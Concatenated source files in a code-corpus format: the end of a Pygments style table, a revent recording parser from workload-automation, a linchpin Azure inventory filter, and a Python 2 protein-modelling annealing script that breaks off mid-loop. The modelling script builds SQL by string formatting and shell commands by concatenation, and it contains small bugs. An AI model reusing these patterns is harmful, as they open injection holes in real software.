        Name.Label:                "#f57900",        # class: 'nl'
        Name.Namespace:            "#000000",        # class: 'nn' - to be revised
        Name.Other:                "#000000",        # class: 'nx'
        Name.Tag:                  "bold #204a87",   # class: 'nt' - like a keyword
        Name.Variable:             "#000000",        # class: 'nv' - to be revised
        Name.Variable.Class:       "#000000",        # class: 'vc' - to be revised
        Name.Variable.Global:      "#000000",        # class: 'vg' - to be revised
        Name.Variable.Instance:    "#000000",        # class: 'vi' - to be revised

        # since the tango light blue does not show up well in text, we choose
        # a pure blue instead.
        Number:                    "bold #0000cf",   # class: 'm'
        Number.Float:              "bold #0000cf",   # class: 'mf'
        Number.Hex:                "bold #0000cf",   # class: 'mh'
        Number.Integer:            "bold #0000cf",   # class: 'mi'
        Number.Integer.Long:       "bold #0000cf",   # class: 'il'
        Number.Oct:                "bold #0000cf",   # class: 'mo'

        Literal:                   "#000000",        # class: 'l'
        Literal.Date:              "#000000",        # class: 'ld'

        String:                    "#4e9a06",        # class: 's'
        String.Backtick:           "#4e9a06",        # class: 'sb'
        String.Char:               "#4e9a06",        # class: 'sc'
        String.Doc:                "italic #8f5902", # class: 'sd' - like a comment
        String.Double:             "#4e9a06",        # class: 's2'
        String.Escape:             "#4e9a06",        # class: 'se'
        String.Heredoc:            "#4e9a06",        # class: 'sh'
        String.Interpol:           "#4e9a06",        # class: 'si'
        String.Other:              "#4e9a06",        # class: 'sx'
        String.Regex:              "#4e9a06",        # class: 'sr'
        String.Single:             "#4e9a06",        # class: 's1'
        String.Symbol:             "#4e9a06",        # class: 'ss'

        Generic:                   "#000000",        # class: 'g'
        Generic.Deleted:           "#a40000",        # class: 'gd'
        Generic.Emph:              "italic #000000", # class: 'ge'
        Generic.Error:             "#ef2929",        # class: 'gr'
        Generic.Heading:           "bold #000080",   # class: 'gh'
        Generic.Inserted:          "#00A000",        # class: 'gi'
        Generic.Output:            "italic #000000", # class: 'go'
        Generic.Prompt:            "#8f5902",        # class: 'gp'
        Generic.Strong:            "bold #000000",   # class: 'gs'
        Generic.Subheading:        "bold #800080",   # class: 'gu'
        Generic.Traceback:         "bold #a40000",   # class: 'gt'
    }
gpl-2.0
lisatn/workload-automation
wa/utils/revent.py
2
10678
# Copyright 2016-2018 ARM Limited # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import os import struct import signal from datetime import datetime from collections import namedtuple from devlib.utils.misc import memoized from wa.framework.resource import Executable, NO_ONE, ResourceResolver from wa.utils.exec_control import once_per_class GENERAL_MODE = 0 GAMEPAD_MODE = 1 u16_struct = struct.Struct('<H') u32_struct = struct.Struct('<I') u64_struct = struct.Struct('<Q') # See revent section in WA documentation for the detailed description of # the recording format. 
# Binary layouts for the revent recording format (all little-endian).
# See the revent section in the WA documentation for the format details.
header_one_struct = struct.Struct('<6sH')
header_two_struct = struct.Struct('<H6x')  # version 2 onwards
devid_struct = struct.Struct('<4H')
devinfo_struct = struct.Struct('<4s96s96s96sI')
absinfo_struct = struct.Struct('<7i')
event_struct = struct.Struct('<HqqHHi')
old_event_struct = struct.Struct("<i4xqqHHi")  # prior to version 2


def read_struct(fh, struct_spec):
    """Read struct_spec.size bytes from *fh* and unpack them per *struct_spec*."""
    data = fh.read(struct_spec.size)
    return struct_spec.unpack(data)


def read_string(fh):
    """Read a u32-length-prefixed string from *fh*; returns a bytes object."""
    length, = read_struct(fh, u32_struct)
    str_struct = struct.Struct('<{}s'.format(length))
    return read_struct(fh, str_struct)[0]


def count_bits(bitarr):
    """Return the total number of set bits across all bytes of *bitarr*."""
    return sum(bin(b).count('1') for b in bitarr)


def is_set(bitarr, bit):
    """Return True if bit number *bit* (LSB-first within each byte) is set
    in the byte array *bitarr*.
    """
    byte = bit // 8
    bytebit = bit % 8
    # Bug fix: the previous implementation tested ``bitarr[byte] & bytebit``,
    # i.e. it ANDed with the bit *index* rather than the bit *mask*
    # (1 << index) -- always falsy for bit 0 and wrong for bits >= 2.
    return bool(bitarr[byte] & (1 << bytebit))


absinfo = namedtuple('absinfo', 'ev_code value min max fuzz flat resolution')


class UinputDeviceInfo(object):
    """Description of a uinput device parsed from a gamepad-mode recording."""

    def __init__(self, fh):
        # Fixed-size device id, then a length-prefixed name, then the
        # event/key/rel/abs capability bitmasks and per-axis absinfo records.
        parts = read_struct(fh, devid_struct)
        self.bustype = parts[0]
        self.vendor = parts[1]
        self.product = parts[2]
        self.version = parts[3]
        self.name = read_string(fh)
        parts = read_struct(fh, devinfo_struct)
        self.ev_bits = bytearray(parts[0])
        self.key_bits = bytearray(parts[1])
        self.rel_bits = bytearray(parts[2])
        self.abs_bits = bytearray(parts[3])
        self.num_absinfo = parts[4]
        self.absinfo = [absinfo(*read_struct(fh, absinfo_struct))
                        for _ in range(self.num_absinfo)]

    def __str__(self):
        return 'UInputInfo({})'.format(self.__dict__)


class ReventEvent(object):
    """A single input event read from a recording.

    :param fh: open binary file positioned at the start of an event record.
    :param legacy: if True, parse the pre-version-2 on-disk layout.
    """

    def __init__(self, fh, legacy=False):
        if not legacy:
            dev_id, ts_sec, ts_usec, type_, code, value = read_struct(fh, event_struct)
        else:
            dev_id, ts_sec, ts_usec, type_, code, value = read_struct(fh, old_event_struct)
        self.device_id = dev_id
        self.time = datetime.fromtimestamp(ts_sec + float(ts_usec) / 1000000)
        self.type = type_
        self.code = code
        self.value = value

    def __str__(self):
        return 'InputEvent({})'.format(self.__dict__)


class ReventRecording(object):
    """
    Represents a parsed revent recording. This contains input events and
    device descriptions recorded by revent.

    Two parsing modes are supported. By default (``stream=True``), headers
    and device descriptions are parsed on creation and an open file handle
    is kept; events are read lazily as they are iterated over, so the whole
    recording is never held in memory at once. Call ``close`` to release the
    file (header information remains accessible, but events no longer are).

    With ``stream=False`` the entire recording is loaded on creation and the
    file handle is closed immediately; subsequent iteration is faster and
    may happen in parallel. In streaming mode each new iteration seeks back
    to the start of the event stream, so parallel iteration is not possible.
    """

    @property
    def duration(self):
        """Length of the recording in seconds; 0 for an empty recording."""
        if self._duration is None:
            if self.stream:
                events = self._iter_events()
                try:
                    first = last = next(events)
                except StopIteration:
                    # Bug fix: previously fell through and referenced
                    # ``first``/``last`` (NameError) instead of returning.
                    self._duration = 0
                    return self._duration
                for last in events:
                    pass
                self._duration = (last.time - first.time).total_seconds()
            else:  # not streaming
                if not self._events:
                    # Bug fix: previously fell through to index an empty
                    # list (IndexError) instead of returning.
                    self._duration = 0
                    return self._duration
                self._duration = (self._events[-1].time -
                                  self._events[0].time).total_seconds()
        return self._duration

    @property
    def events(self):
        """The recording's events: a fresh generator when streaming,
        otherwise the pre-loaded list."""
        if self.stream:
            return self._iter_events()
        else:
            return self._events

    def __init__(self, f, stream=True):
        self.device_paths = []
        self.gamepad_device = None
        self.num_events = None
        self.stream = stream
        self._events = None
        self._close_when_done = False
        self._events_start = None
        self._duration = None
        if hasattr(f, 'name'):  # file-like object
            self.filepath = f.name
            self.fh = f
        else:  # path to file
            self.filepath = f
            self.fh = open(self.filepath, 'rb')
            # Only close handles we opened ourselves.
            if not self.stream:
                self._close_when_done = True
        try:
            self._parse_header_and_devices(self.fh)
            self._events_start = self.fh.tell()
            if not self.stream:
                self._events = list(self._iter_events())
        finally:
            if self._close_when_done:
                self.close()

    def close(self):
        """Release the underlying file handle (idempotent)."""
        if self.fh is not None:
            self.fh.close()
            self.fh = None
            self._events_start = None

    def _parse_header_and_devices(self, fh):
        """Parse the magic/version header, mode, device info, event count,
        and (version 3+) start/end timestamps."""
        magic, version = read_struct(fh, header_one_struct)
        if magic != b'REVENT':
            msg = '{} does not appear to be an revent recording'
            raise ValueError(msg.format(self.filepath))
        self.version = version
        if 3 >= self.version >= 2:
            self.mode, = read_struct(fh, header_two_struct)
            if self.mode == GENERAL_MODE:
                self._read_devices(fh)
            elif self.mode == GAMEPAD_MODE:
                self._read_gamepad_info(fh)
            else:
                raise ValueError('Unexpected recording mode: {}'.format(self.mode))
            self.num_events, = read_struct(fh, u64_struct)
            if self.version > 2:
                ts_sec = read_struct(fh, u64_struct)[0]
                ts_usec = read_struct(fh, u64_struct)[0]
                self.start_time = datetime.fromtimestamp(ts_sec + float(ts_usec) / 1000000)
                ts_sec = read_struct(fh, u64_struct)[0]
                ts_usec = read_struct(fh, u64_struct)[0]
                self.end_time = datetime.fromtimestamp(ts_sec + float(ts_usec) / 1000000)
        elif 2 > self.version >= 0:
            # Legacy recordings have no mode byte and are always general-mode.
            self.mode = GENERAL_MODE
            self._read_devices(fh)
        else:
            raise ValueError('Invalid recording version: {}'.format(self.version))

    def _read_devices(self, fh):
        num_devices, = read_struct(fh, u32_struct)
        for _ in range(num_devices):
            self.device_paths.append(read_string(fh))

    def _read_gamepad_info(self, fh):
        self.gamepad_device = UinputDeviceInfo(fh)
        self.device_paths.append('[GAMEPAD]')

    def _iter_events(self):
        """Yield ReventEvents from the start of the event stream.

        Version 2+ recordings carry an event count; older ones are read
        until end-of-file.
        """
        if self.fh is None:
            msg = 'Attempting to iterate over events of a closed recording'
            raise RuntimeError(msg)
        self.fh.seek(self._events_start)
        if self.version >= 2:
            for _ in range(self.num_events):
                yield ReventEvent(self.fh)
        else:
            file_size = os.path.getsize(self.filepath)
            while self.fh.tell() < file_size:
                yield ReventEvent(self.fh, legacy=True)

    def __iter__(self):
        for event in self.events:
            yield event

    def __enter__(self):
        return self

    def __exit__(self, *args):
        self.close()

    def __del__(self):
        self.close()


def get_revent_binary(abi):
    """Resolve the path of the host-side revent executable for *abi*."""
    resolver = ResourceResolver()
    resolver.load()
    resource = Executable(NO_ONE, abi, 'revent')
    return resolver.get(resource)


class ReventRecorder(object):
    """Drive the revent binary on a devlib target to record/replay input."""

    # Share location of target executable across all instances
    target_executable = None

    def __init__(self, target):
        self.target = target
        if not ReventRecorder.target_executable:
            ReventRecorder.target_executable = self._get_target_path(self.target)

    @once_per_class
    def deploy(self):
        # NOTE(review): the original's indentation was ambiguous in the
        # source view; the install below is taken as unconditional --
        # confirm against upstream before relying on this.
        if not ReventRecorder.target_executable:
            ReventRecorder.target_executable = self.target.get_installed('revent')
        host_executable = get_revent_binary(self.target.abi)
        ReventRecorder.target_executable = self.target.install(host_executable)

    @once_per_class
    def remove(self):
        if ReventRecorder.target_executable:
            self.target.uninstall('revent')

    def start_record(self, revent_file):
        """Start recording input events into *revent_file* on the target."""
        command = '{} record -s {}'.format(ReventRecorder.target_executable, revent_file)
        self.target.kick_off(command, self.target.is_rooted)

    def stop_record(self):
        """Stop an in-flight recording by SIGINT-ing revent on the target."""
        self.target.killall('revent', signal.SIGINT, as_root=self.target.is_rooted)

    def replay(self, revent_file, timeout=None):
        """Replay a previously recorded *revent_file* on the target."""
        self.target.killall('revent')
        command = "{} replay {}".format(ReventRecorder.target_executable, revent_file)
        self.target.execute(command, timeout=timeout)

    @memoized
    @staticmethod
    def _get_target_path(target):
        return target.get_installed('revent')
apache-2.0
CentOS-PaaS-SIG/linchpin
linchpin/provision/roles/azure/files/inventory.py
3
1647
from __future__ import absolute_import from collections import OrderedDict from linchpin.InventoryFilters.InventoryFilter import InventoryFilter class Inventory(InventoryFilter): # DEFAULT_HOSTNAMES = ['public_dns_name', 'public_ip', 'private_ip'] def get_host_data(self, res, cfgs): """ Returns a dict of hostnames or IP addresses for use in an Ansible inventory file, based on available data. Only a single hostname or IP address will be returned per instance, so as to avoid duplicate runs of Ansible on the same host via the generated inventory file. Each hostname contains mappings of any variable that was defined in the cfgs section of the PinFile (e.g. __IP__) to the value in the field that corresponds with that variable in the cfgs. :param topo: linchpin Azure VM resource data :param cfgs: map of config options from PinFile """ host_data = OrderedDict() if res['resource_group'] != 'azure'or res['role'] != 'azure_vm': return host_data var_data = cfgs.get('azure', {}) if var_data is None: var_data = {} networks = res['properties']['networkProfile']['networkInterfaces'] for network in networks: mid = network['properties']['ipConfigurations'][0] # mid: this is a middle variable for flake test ip = mid['properties']['publicIPAddress']['properties']['ipAddress'] host_data[ip] = {"__IP__": ip} self.set_config_values(host_data[ip], res, var_data) return host_data
gpl-3.0
MizzouCMMSGroup1/TFPyModeller
src/sa_v3.py
1
20979
'''current test sequence''' INPUT_SEQUENCE = '' '''fragment database''' DATABASE_NAME_NINE = 'fragment_database/17K_PDB_nine_sequences.db' DATABASE_NAME_THREE = 'fragment_database/17K_PDB_three_sequences.db' '''store working files in temp_out''' TMP_DIR = "temp_out/" #TESTING_SIGMOID = True TESTING_SIGMOID = False '''store working files in temp_out subdirectory/start of each file''' PDB_PREPEND_NAME9 = TMP_DIR+"simulation_9_" PDB_PREPEND_NAME3 = TMP_DIR+"simulation_3_" '''number of hill climbing simulations to run''' NUMBER_SIMULATIONS = 3 #some imports we need import os import subprocess import random import math import copy import argparse #blosum62 from blosum62 import Blosum62 blosum = Blosum62() bmatrix = blosum.matrix #keep track of our db import sqlite3 conn9 = sqlite3.connect(DATABASE_NAME_NINE) conn9.row_factory = sqlite3.Row cursor9 = conn9.cursor() conn3 = sqlite3.connect(DATABASE_NAME_THREE) conn3.row_factory = sqlite3.Row cursor3 = conn3.cursor() #utility functions def phipsi_file_name9(phipsi_number): '''return phipsi/lipa file name for input number''' return PDB_PREPEND_NAME9 + str(phipsi_number) +".txt" def pdb_lipa_name9(pdb_number): '''return PDB file name for input number''' return PDB_PREPEND_NAME9 + "lipa_" + str(pdb_number) +".pdb" def phipsi_file_name3(phipsi_number): '''return phipsi/lipa file name for input number''' return PDB_PREPEND_NAME3 + str(phipsi_number) +".txt" def pdb_lipa_name3(pdb_number): '''return PDB file name for input number''' return PDB_PREPEND_NAME3 + "lipa_" + str(pdb_number) +".pdb" def stats_save_name(): return TMP_DIR+"stats" +".txt" def stats_append(sequence_count,trial_number,score): '''add data to stats file''' STATS_OUT = stats_save_name() file = open(STATS_OUT, "a") file.write("{0}, {1}, {2}\n".format(sequence_count, trial_number, score)) file.close() #code for initialization of protein randomly from sequence database def phipsi_append(phipsi_number, acid, phi, psi): '''add data to phipsi file''' PHIPSI_OUT = 
phipsi_file_name9(phipsi_number) file = open(PHIPSI_OUT, "a") file.write("{0} {1:5} {2:5}\n".format(acid, phi, psi)) file.close() def append_sequence(pdb_number, a,b,c, d,e,f, g,h,i, skip_sequences=0): '''find sequence from database for each chunk of three residues, add to phipsi file''' #sequence = a+b+c+d+e+f+g+h+i #print sequence base_sequence = [a,b,c,d,e,f,g,h,i] sequence = copy.copy(base_sequence) #print sequence cursor9.execute("SELECT * FROM sequences WHERE seq = '%s' ORDER BY RANDOM() LIMIT 1;" % ''.join(sequence)) data = cursor9.fetchone() j = 0 k = 0 while data == None: query = ''.join(sequence) cursor9.execute("SELECT * FROM sequences WHERE seq = '%s' ORDER BY RANDOM() LIMIT 1;" % (query)) data = cursor9.fetchone() if data == None: sequence = copy.copy(base_sequence) sequence[j%9] = bmatrix[base_sequence[j%9]][0][0] if j%9 == 0 and j > 0: base_sequence[k%9] = bmatrix[base_sequence[k%9]][0][0] k = k+1 print("no match found. using",''.join(sequence),"instead") j += 1 if j > 17: # after three cycles we're too far away from the original sequence #need a better LIKE clause here (BLOSUM scores?) cursor9.execute("SELECT * FROM sequences WHERE seq LIKE '%s_______%s' ORDER BY RANDOM() LIMIT 1;" % (a, i)) data = cursor9.fetchone() if data == None: "WARNING: no replacement found!" 
exit() print "couldn't find sequence:", sequence, "using replacement:", data["seq"] #using modular arithmetic to only update the last few residues when needed if skip_sequences<1: phipsi_append(pdb_number,a,data["acid_a_phi"],data["acid_a_psi"]) if skip_sequences<2: phipsi_append(pdb_number,b,data["acid_b_phi"],data["acid_b_psi"]) if skip_sequences<3: phipsi_append(pdb_number,c,data["acid_c_phi"],data["acid_c_psi"]) if skip_sequences<4: phipsi_append(pdb_number,d,data["acid_d_phi"],data["acid_d_psi"]) if skip_sequences<5: phipsi_append(pdb_number,e,data["acid_e_phi"],data["acid_e_psi"]) if skip_sequences<6: phipsi_append(pdb_number,f,data["acid_f_phi"],data["acid_f_psi"]) if skip_sequences<7: phipsi_append(pdb_number,g,data["acid_g_phi"],data["acid_g_psi"]) if skip_sequences<8: phipsi_append(pdb_number,h,data["acid_h_phi"],data["acid_h_psi"]) if skip_sequences<9: phipsi_append(pdb_number,i,data["acid_i_phi"],data["acid_i_psi"]) def build_model(pdb_number): '''build initial model for each chunk of three residues''' sequence_length = len(INPUT_SEQUENCE) i = 0 while i<sequence_length-8: append_sequence(pdb_number, INPUT_SEQUENCE[i], INPUT_SEQUENCE[i+1], INPUT_SEQUENCE[i+2], INPUT_SEQUENCE[i+3], INPUT_SEQUENCE[i+4], INPUT_SEQUENCE[i+5], INPUT_SEQUENCE[i+6], INPUT_SEQUENCE[i+7], INPUT_SEQUENCE[i+8] ) i+=9 #return #some code to deal with last one/two acids if (sequence_length%9>0): append_sequence(pdb_number, INPUT_SEQUENCE[sequence_length-9], INPUT_SEQUENCE[sequence_length-8], INPUT_SEQUENCE[sequence_length-7], INPUT_SEQUENCE[sequence_length-6], INPUT_SEQUENCE[sequence_length-5], INPUT_SEQUENCE[sequence_length-4], INPUT_SEQUENCE[sequence_length-3], INPUT_SEQUENCE[sequence_length-2], INPUT_SEQUENCE[sequence_length-1], 9-sequence_length%9) #code for randomly replacing protein sub-sequences (from sequence database) def phipsi_replace9(old_model_number, new_model_number, a, a_phi, a_psi, b, b_phi, b_psi, c, c_phi, c_psi, d, d_phi, d_psi, e, e_phi, e_psi, f, f_phi, f_psi, g, 
g_phi, g_psi, h, h_phi, h_psi, i, i_phi, i_psi, sequence_offset=-1): '''copy over old phipsi file to new one and add new sequence data''' if (sequence_offset<0): print "bad things happened" exit() else: print "seq offset:", sequence_offset, "old model:", old_model_number, "new model:", new_model_number PHIPSI_IN = phipsi_file_name9(old_model_number) PHIPSI_OUT = phipsi_file_name9(new_model_number) lines = [line.strip() for line in open(PHIPSI_IN)] a_out = "{0} {1:5} {2:5}\n".format(a, a_phi, a_psi) b_out = "{0} {1:5} {2:5}\n".format(b, b_phi, b_psi) c_out = "{0} {1:5} {2:5}\n".format(c, c_phi, c_psi) d_out = "{0} {1:5} {2:5}\n".format(d, d_phi, d_psi) e_out = "{0} {1:5} {2:5}\n".format(e, e_phi, e_psi) f_out = "{0} {1:5} {2:5}\n".format(f, f_phi, f_psi) g_out = "{0} {1:5} {2:5}\n".format(g, g_phi, g_psi) h_out = "{0} {1:5} {2:5}\n".format(h, h_phi, h_psi) i_out = "{0} {1:5} {2:5}\n".format(i, i_phi, i_psi) out_file = open(PHIPSI_OUT, "a") i = 0 numlines = len(lines) while i < sequence_offset: out_file.write(lines[i]+"\n") i+=1 out_file.write(a_out) out_file.write(b_out) out_file.write(c_out) out_file.write(d_out) out_file.write(e_out) out_file.write(f_out) out_file.write(g_out) out_file.write(h_out) out_file.write(i_out) i+=9 while i < numlines: out_file.write(lines[i]+"\n") i+=1 out_file.close() def replace_sequence9(old_model_number, new_model_number, a,b,c, d,e,f, g,h,i, sequence_offset=-1): '''find a new replacement sequence for an input''' if (sequence_offset<0): print "bad things happened" exit() #sequence = a+b+c+d+e+f+g+h+i #print sequence base_sequence = [a,b,c,d,e,f,g,h,i] sequence = copy.copy(base_sequence) #print sequence cursor9.execute("SELECT * FROM sequences WHERE seq = '%s' ORDER BY RANDOM() LIMIT 1;" % ''.join(sequence)) data = cursor9.fetchone() j = 0 k = 0 while data == None: query = ''.join(sequence) cursor9.execute("SELECT * FROM sequences WHERE seq = '%s' ORDER BY RANDOM() LIMIT 1;" % (query)) data = cursor9.fetchone() if data == None: 
sequence = copy.copy(base_sequence) sequence[j%9] = bmatrix[base_sequence[j%9]][0][0] if j%9 == 0 and j > 0: base_sequence[k%9] = bmatrix[base_sequence[k%9]][0][0] k = k+1 print("no match found. using",''.join(sequence),"instead") j += 1 if j > 17: # after three cycles we're too far away from the original sequence #need a better LIKE clause here (BLOSUM scores?) cursor9.execute("SELECT * FROM sequences WHERE seq LIKE '%s_______%s' ORDER BY RANDOM() LIMIT 1;" % (a, i)) data = cursor9.fetchone() if data == None: "WARNING: no replacement found!" exit() print "couldn't find sequence:", sequence, "using replacement:", data["seq"] #print "skipping search" #return phipsi_replace9(old_model_number, new_model_number,a,data["acid_a_phi"],data["acid_a_psi"], b,data["acid_b_phi"],data["acid_b_psi"], c,data["acid_c_phi"],data["acid_c_psi"], d,data["acid_d_phi"],data["acid_d_psi"], e,data["acid_e_phi"],data["acid_e_psi"], f,data["acid_f_phi"],data["acid_f_psi"], g,data["acid_g_phi"],data["acid_g_psi"], h,data["acid_h_phi"],data["acid_h_psi"], i,data["acid_i_phi"],data["acid_i_psi"], sequence_offset) def randomize_model9(old_model_number, new_model_number): '''pick three residues at random and replace them''' sequence_length = len(INPUT_SEQUENCE) random_offset = random.randint(0,sequence_length-9) #can't select beyond last residue replace_sequence9(old_model_number, new_model_number, INPUT_SEQUENCE[random_offset], INPUT_SEQUENCE[random_offset+1], INPUT_SEQUENCE[random_offset+2], INPUT_SEQUENCE[random_offset+3], INPUT_SEQUENCE[random_offset+4], INPUT_SEQUENCE[random_offset+5], INPUT_SEQUENCE[random_offset+6], INPUT_SEQUENCE[random_offset+7], INPUT_SEQUENCE[random_offset+8], random_offset) #code for randomly replacing protein sub-sequences (from sequence database) def phipsi_replace3(old_model_number, new_model_number, a, a_phi, a_psi, b, b_phi, b_psi, c, c_phi, c_psi, sequence_offset=-1): '''copy over old phipsi file to new one and add new sequence data''' if (sequence_offset<0): 
print "bad things happened" exit() else: print "seq offset:", sequence_offset, "old model:", old_model_number, "new model:", new_model_number PHIPSI_IN = phipsi_file_name3(old_model_number) PHIPSI_OUT = phipsi_file_name3(new_model_number) lines = [line.strip() for line in open(PHIPSI_IN)] a_out = "{0} {1:5} {2:5}\n".format(a, a_phi, a_psi) b_out = "{0} {1:5} {2:5}\n".format(b, b_phi, b_psi) c_out = "{0} {1:5} {2:5}\n".format(c, c_phi, c_psi) out_file = open(PHIPSI_OUT, "a") i = 0 numlines = len(lines) while i < sequence_offset: out_file.write(lines[i]+"\n") i+=1 out_file.write(a_out) out_file.write(b_out) out_file.write(c_out) i+=3 while i < numlines: out_file.write(lines[i]+"\n") i+=1 out_file.close() def replace_sequence3(old_model_number, new_model_number, a,b,c, sequence_offset=-1): '''find a new replacement sequence for an input''' if (sequence_offset<0): print "bad things happened" exit() sequence = a+b+c #print sequence cursor3.execute("SELECT * FROM sequences WHERE seq = '%s' ORDER BY RANDOM() LIMIT 1;" % sequence) data = cursor3.fetchone() if data == None: #need a better LIKE clause here (BLOSUM scores?) cursor3.execute("SELECT * FROM sequences WHERE seq LIKE '%s_%s' ORDER BY RANDOM() LIMIT 1;" % (a, c)) data = cursor3.fetchone() if data == None: "WARNING: no replacement found!" 
exit() return print "couldn't find sequence:", sequence, "using replacement:", data["seq"] phipsi_replace3(old_model_number, new_model_number,a,data["acid_a_phi"],data["acid_a_psi"],b,data["acid_b_phi"],data["acid_b_psi"],c,data["acid_c_phi"],data["acid_c_psi"], sequence_offset) def randomize_model3(old_model_number, new_model_number): '''pick three residues at random and replace them''' sequence_length = len(INPUT_SEQUENCE) random_offset = random.randint(0,sequence_length-3) #can't select beyond last residue replace_sequence3(old_model_number, new_model_number, INPUT_SEQUENCE[random_offset], INPUT_SEQUENCE[random_offset+1], INPUT_SEQUENCE[random_offset+2], random_offset) #global utility function to build/score pdb file def build_score_pdb_model9(pdb_number): '''send phipsi to lipa to generated pdb, score with dfire, return score (most negative == best)''' PDB_OUT = phipsi_file_name9(pdb_number) PDB_OUT_LIPA = pdb_lipa_name9(pdb_number) lipa_convert = os.system("./lipa " + PDB_OUT + " -o " + PDB_OUT_LIPA) dfire_output = subprocess.check_output("./dDFIRE " + PDB_OUT_LIPA, shell=True) dfire_output_split = dfire_output.split(":") dfire_output_split_nums = dfire_output_split[1].split(" ") print "pdb:", PDB_OUT_LIPA, "dfire_score:", float(dfire_output_split_nums[1]) return float(dfire_output_split_nums[1]) #global utility function to build/score pdb file def build_score_pdb_model3(pdb_number): '''send phipsi to lipa to generated pdb, score with dfire, return score (most negative == best)''' PDB_OUT = phipsi_file_name3(pdb_number) PDB_OUT_LIPA = pdb_lipa_name3(pdb_number) lipa_convert = os.system("./lipa " + PDB_OUT + " -o " + PDB_OUT_LIPA) dfire_output = subprocess.check_output("./dDFIRE " + PDB_OUT_LIPA, shell=True) dfire_output_split = dfire_output.split(":") dfire_output_split_nums = dfire_output_split[1].split(" ") print "pdb:", PDB_OUT_LIPA, "dfire_score:", float(dfire_output_split_nums[1]) return float(dfire_output_split_nums[1]) #temperature calculator. 
non-linear decrease def sigmoid_temperature(k): return -5000/(1 + math.exp(-k/200)) + 5000 def linear_temperature(k): return (-2500/1000)*k + 2500 #init and run hill climbing, print out results def main(): global TESTING_SIGMOID global INPUT_SEQUENCE global TMP_DIR global PDB_PREPEND_NAME9 global PDB_PREPEND_NAME3 parser = argparse.ArgumentParser(description="Runner for TFPyModeller") parser.add_argument('-t','--target', help='target name to use',type=int,default='0') parser.add_argument('-d','--decoys', help='simulation id',type=int,default=0) t_group = parser.add_mutually_exclusive_group() t_group.add_argument('-l','--linear',action='store_false') t_group.add_argument('-s','--sigmoid',action='store_true') parser.add_argument('-k','--sequence',help='sequence to run') args = parser.parse_args() target = args.target simulation_id = args.decoys temperature = 'sigmoid' if args.sigmoid: TESTING_SIGMOID = True if target == 0: INPUT_SEQUENCE = 'MLGLVLLYVGIVLISNGICGLTKVDPKSTAVMNFFVGGLSIVCNVVVITYSALHPTAPVEGAEDIVQVSHHLTSFYGPATGLLFGFTYLYAAINHTFGLDWRPYSWYSLFVAINTVPAAILSHYSDMLDDHKVLGITEGDWWAIIWLAWGVLWLTAFIENILKIPLGKFTPWLAIIEGILTAWIPAWLLFIQHWV' if TESTING_SIGMOID: TMP_DIR = "T0666_sigmoid_1k/" else: TMP_DIR = "T0666_linear_1k/" if target == 1: INPUT_SEQUENCE = 'KIYAEIDRLESWKIEILNRSIVEEMSKIKHLKMTGQTEEFFEKWREEWDEIVTAHMPKVEELLYDAEENADKYRFKKANQVLVHIDDLLTAAESSIEKILREISDLVTSEEKSREEIEQVRERYSKSRKNLLAYSHLYGELYDSLEKDLDEIWSGIKQFEEETEGGNYITARKVLLEQDRNLERLQSYIDDVPKLLADCKQTVPGQIAKLKDGYGEMKEKGYKLEHIQLDKELENLSNQLKRAEHVLMTELDIDEASAILQLIDENIQSVYQQLEGEVEAGQSVLSKMPELIIAYDKLKEEKEHTKAETELVKESYRLTAGELGKQQAFEKRLDEIGKLLSSVKDKLDAEHVAYSLLVEEVASIEKQIEEVKKEHAEYRENLQALRKEELQARETLSNLKKTISETARLLKTSNIPGIPSHIQEMLENAHHHIQETVNQLNELPLNMEEAGAHLKQAEDIVNRASRESEELVEQVILIEKIIQFGNRFRSQNHILSEQLKEAERRFYAFDYDDSYEIAAAAVEKAAPGAVEKIKAD' if TESTING_SIGMOID: TMP_DIR = "T0695_sigmoid_1k/" else: TMP_DIR = "T0695_linear_1k/" if target == 2: INPUT_SEQUENCE = 
'MIDLAPLVRRLAGTPLAEWANGLQAQLDTKMSKGHGDLQRWQSALDALPALQPEKVDLTDSFTLETECDGETRTVLRKALLGLSPWRKGPFNVFGVHIDT' if TESTING_SIGMOID: TMP_DIR = "T0693_sigmoid_1k/" else: TMP_DIR = "T0693_linear_1k/" PDB_PREPEND_NAME9 = TMP_DIR+"simulation_9_" PDB_PREPEND_NAME3 = TMP_DIR+"simulation_3_" #cleanup if not os.path.exists(TMP_DIR): print("Making temp directory") os.mkdir(TMP_DIR) else: print("Clearing temp directory") for root,dirs,files in os.walk(TMP_DIR,topdown=False): for name in files: os.remove(os.path.join(root,name)) ''' #cleanup for i in range(1,NUMBER_SIMULATIONS+1): if os.path.exists(phipsi_file_name(i)): os.rm() os.system("rm " + phipsi_file_name(i)) os.system("rm " + pdb_lipa_name(i)) ''' #build initial random model build_model(0) best_dfire_score = 1e6 #best is lowest best_dfire_number = -1 old_model_number = 0 #test models #model 0 is the initial sequence for i in range(1,NUMBER_SIMULATIONS+1,1): T = 0 if TESTING_SIGMOID: T = sigmoid_temperature(i) else: T = linear_temperature(i) randomize_model9(old_model_number, i) i_score = build_score_pdb_model9(i) stats_append(9,i,i_score) score_diff = i_score - best_dfire_score if score_diff > 0: #print("score diff", score_diff) score_diff = score_diff if score_diff < 5*T else 5*T prob_to_accept = math.exp(-100*score_diff/T) print("probability to accept:", prob_to_accept) if prob_to_accept < random.random(): #print("probability not enough") continue print("accepting some randomness") #print("scoring") #if i_score < best_dfire_score: best_dfire_score = i_score best_dfire_number = i old_model_number = i #save best stats_append(9000,best_dfire_number,best_dfire_score) best_model = best_dfire_number #convert best nine model to three to start model refinement print (phipsi_file_name9(best_model)) print (phipsi_file_name3(0)) os.system("cp " + phipsi_file_name9(best_model) + " " + phipsi_file_name3(0)) best_model = 0 best_dfire_score = 1e6 for i in range(1,NUMBER_SIMULATIONS+1,1): T = 0 if TESTING_SIGMOID: T = sigmoid_temperature(i) 
